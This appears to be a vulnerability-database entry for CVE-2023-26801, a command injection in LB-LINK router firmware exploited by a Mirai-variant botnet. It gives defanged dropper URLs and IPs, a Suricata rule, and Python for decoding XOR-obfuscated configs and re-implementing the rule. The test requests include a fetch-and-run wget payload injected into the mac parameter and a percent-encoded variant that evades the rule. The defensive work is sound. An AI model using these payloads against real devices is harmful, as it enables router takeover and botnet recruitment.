CVE-2023-26801
published 2023-03-26

CVE-2023-26801: LB-LINK BL-AC1900_2.0 v1.0.1, LB-LINK BL-WR9000 v2.4.9, LB-LINK BL-X26 v1.2.5, and LB-LINK BL-LTE300 v1.0.8 were discovered to contain a command injection…

Priority: P1 85 · critical 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW: VulnCheck KEV · Exploited in the wild
EPSS: 69.66% (99.3rd percentile)
LB-LINK BL-AC1900_2.0 v1.0.1, LB-LINK BL-WR9000 v2.4.9, LB-LINK BL-X26 v1.2.5, and LB-LINK BL-LTE300 v1.0.8 were discovered to contain a command injection vulnerability via the mac, time1, and time2 parameters at /goform/set_LimitClient_cfg.

Affected (4 ranges)

Vendor    Product              Version range    Fixed in
lb-link   bl-ac1900_firmware
lb-link   bl-lte300_firmware
lb-link   bl-wr9000_firmware
lb-link   bl-x26_firmware

Detection & IOCs (extracted from sources)

ip        163.123.143[.]126
url       hxxp://163.123.143[.]126/bins/dark.x86
url       hxxp://163.123.143[.]126/bins/dark.mips
url       hxxp://163.123.143[.]126/bins/dark.mpsl
url       hxxp://163.123.143[.]126/bins/dark.arm4
url       hxxp://163.123.143[.]126/bins/dark.arm5
url       hxxp://163.123.143[.]126/bins/dark.arm6
url       hxxp://163.123.143[.]126/bins/dark.arm7
url       hxxp://163.123.143[.]126/bins/dark.ppc
url       hxxp://163.123.143[.]126/bins/dark.m68k
url       hxxp://163.123.143[.]126/bins/dark.sh4
url       hxxp://163.123.143[.]126/bins/dark.86_64
url       hxxp://2.56.59[.]215/i.sh
url       hxxp://212.192.241[.]72/lolol.sh
ip        2.56.59[.]215
ip        195.133.40[.]141
url       hxxp://31.210.20[.]100/lolol.sh
url       hxxp://212.192.241[.]87/bins/
domain    dotheneedfull[.]club
ip        193.47.61[.]75
filename  lb.sh
path      /goform/set_LimitClient_cfg
snort/suricata (Emerging Threats rule 2048548; the http.method/http.uri/http.request_body sticky buffers and bsize are Suricata 5+ syntax)
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT LB-Link Command Injection Attempt (CVE-2023-26801)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:27; content:"/goform/set_LimitClient_cfg"; http.request_body; content:"time1="; startswith; fast_pattern; content:"&time2"; distance:0; content:"&mac="; distance:0; pcre:"/^[^&]*?(?:(wget|curl))/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-iz1h9; reference:cve,2023-26801; classtype:attempted-admin; sid:2048548; rev:3;)
bytes     Configuration XOR key 0xBAADF00D. The key is applied a byte at a time (each byte XORed with all four key bytes in turn), so it is equivalent to the single-byte key 0xBA ^ 0xAD ^ 0xF0 ^ 0x0D = 0xEA
bytes     Telnet/SSH credentials XOR key 0x54
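Why the 32-bit key listed above collapses to one byte, as an added example that is not code from this page or from the Unit 42 write-up it cites: the key is folded the way Mirai-derived table code applies it, the two keys on the page are used to decode constructed blobs, and an unknown single-byte key is recovered from a known plaintext. The strings "/bin/busybox", "IZ1H9", "root" and "admin" and the encoded blobs built from them are constructed demo inputs, not bytes recovered from a sample.

```python
# Added example (not code from this page or from the Unit 42 write-up):
# why 0xBAADF00D collapses to the single byte 0xEA, plus decoders for the
# two keys listed above. All encoded blobs below are constructed for the demo.
from typing import List, Optional

CONFIG_KEY32 = 0xBAADF00D   # configuration key from the page
CREDS_KEY = 0x54            # Telnet/SSH credential key from the page


def fold_key(key32: int) -> int:
    """Mirai-derived table code XORs every config byte with each of the four
    key bytes in turn. XOR is associative, so that equals one XOR with the
    four bytes folded together (0xBA ^ 0xAD ^ 0xF0 ^ 0x0D = 0xEA here)."""
    folded = 0
    for shift in (24, 16, 8, 0):
        folded ^= (key32 >> shift) & 0xFF
    return folded


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; the same function encodes and decodes."""
    return bytes(b ^ key for b in data)


def decode_config(blob: bytes, key32: int = CONFIG_KEY32) -> List[str]:
    """Decode a blob of NUL-terminated config strings obfuscated with the folded key."""
    plain = xor_bytes(blob, fold_key(key32))
    return [s.decode("latin-1") for s in plain.split(b"\x00") if s]


def recover_single_byte_key(blob: bytes, known: bytes) -> Optional[int]:
    """Known-plaintext recovery for a sample that uses a different single-byte
    key: try all 256 keys and return the first whose decoding contains `known`
    (a default credential such as b"admin" is a dependable crib)."""
    for key in range(256):
        if known in xor_bytes(blob, key):
            return key
    return None


# Constructed demo blobs: plaintexts encoded with the page's keys so the
# decoders have input to work on. Not bytes recovered from a real sample.
CONFIG_BLOB = xor_bytes(b"/bin/busybox\x00IZ1H9\x00", fold_key(CONFIG_KEY32))
CREDS_BLOB = xor_bytes(b"root\x00admin\x00", CREDS_KEY)

if __name__ == "__main__":
    print(hex(fold_key(CONFIG_KEY32)))
    print(decode_config(CONFIG_BLOB))
    print(xor_bytes(CREDS_BLOB, CREDS_KEY).split(b"\x00"))
    print(hex(recover_single_byte_key(CREDS_BLOB, b"admin")))
```

The practical point of the fold: when triaging a new variant, a different 32-bit constant in the table-init routine still means only 256 candidate keys, so a crib search like recover_single_byte_key() is enough to read the config without reversing the routine.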
  • Exploit traffic targets HTTP POST to /goform/set_LimitClient_cfg with parameters time1, time2, and mac; payload contains wget or curl commands for dropper download (regex: /^[^&]*?(?:(wget|curl))/R in body)
  • URI length for exploit request is exactly 27 bytes (/goform/set_LimitClient_cfg); use bsize:27 in URI matching to reduce false positives
  • Threat Prevention signatures 93386, 93718, 93721, 93722 cover the exploit and malware activity associated with this campaign
  • The botnet uses custom UPX packing with unique signatures; standard UPX detection may miss samples — look for UPX headers with non-standard magic bytes
  • The Tenda vulnerability exploit function in this IZ1H9 sample contains a bug: it downloads tenda.sh but executes netlog.sh, so that particular exploit chain will not work as intended
  • The reported hash artifact (692a5d099e37cd94923ea2) appears truncated in the source document and may be incomplete; verify against the full hash before using it for detection
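The request shape described in the rule and the notes above (POST to the 27-byte URI, time1/time2/mac in order, wget or curl inside the mac value), as an added example that is not code from this page, from the Emerging Threats rule authors or from Unit 42: the rule's match conditions re-implemented in Python and run over constructed HTTP requests. The sample requests, the 192.0.2.10 host and the use of lb.sh as the dropper name are constructed for the demo; matches_decoded() goes beyond the rule as written by also testing a percent-decoded copy of the body.

```python
# Added example (not code from this page, from the ET rule authors or from
# Unit 42): the match conditions of ET sid 2048548 re-implemented in Python
# and exercised against constructed requests.
import re
from urllib.parse import unquote_to_bytes

# The rule's http.uri match: bsize:27 means the URI must be exactly this string,
# so a request with a query string appended does not match the rule either.
TARGET_PATH = b"/goform/set_LimitClient_cfg"

# Body logic of the rule: "time1=" at offset 0 (startswith), then "&time2",
# then "&mac=" (distance:0 = anywhere after the previous match), then the pcre
# /^[^&]*?(?:(wget|curl))/R: wget or curl inside the mac value, before the next '&'.
BODY_RE = re.compile(rb"^time1=.*?&time2.*?&mac=[^&]*?(?:wget|curl)", re.DOTALL)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, request-target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def _target_post_body(raw: bytes):
    """Return the body if this is a POST to the exact 27-byte URI, else None."""
    method, target, _headers, body = parse_request(raw)
    if method != b"POST" or target != TARGET_PATH:
        return None
    return body


def matches_et_2048548(raw: bytes) -> bool:
    """Mirror the rule as written: it inspects raw body bytes only."""
    body = _target_post_body(raw)
    return body is not None and BODY_RE.search(body) is not None


def matches_decoded(raw: bytes) -> bool:
    """Extension (mine, not part of the rule): also test a percent-decoded copy
    of the body, since '%77get' slips past a raw-byte match for 'wget'."""
    body = _target_post_body(raw)
    if body is None:
        return False
    return (BODY_RE.search(body) is not None
            or BODY_RE.search(unquote_to_bytes(body)) is not None)


def build_request(body: bytes, target: bytes = TARGET_PATH) -> bytes:
    """Assemble a minimal HTTP/1.1 POST for the constructed samples below."""
    return (b"POST " + target + b" HTTP/1.1\r\n"
            b"Host: 192.0.2.1\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


# Constructed samples (192.0.2.10 is an RFC 5737 documentation address; lb.sh
# is the dropper filename from the IOC list above).
BENIGN = build_request(b"time1=08:00&time2=20:00&mac=00:11:22:33:44:55")
INJECTED = build_request(
    b"time1=1&time2=1&mac=;wget http://192.0.2.10/lb.sh -O /tmp/lb.sh;sh /tmp/lb.sh;")
ENCODED = build_request(
    b"time1=1&time2=1&mac=%3B%77get%20http%3A%2F%2F192.0.2.10%2Flb.sh")
WRONG_URI = build_request(b"time1=1&time2=1&mac=;wget x",
                          target=b"/goform/set_LimitClient_cfg?x=1")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("injected", INJECTED),
                      ("encoded", ENCODED), ("wrong_uri", WRONG_URI)):
        print(f"{name:10s} raw={matches_et_2048548(req)} decoded={matches_decoded(req)}")
```

Two limits of the rule are visible here: it anchors on an exact 27-byte URI, so any query string appended to the path defeats it, and it matches raw body bytes, so percent-encoded command text is missed. The decoded pass covers the second case but not the first.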

CVSS provenance

Source      Version   Score          Vector
nvd         v3.1      9.8 CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck             9.8 CRITICAL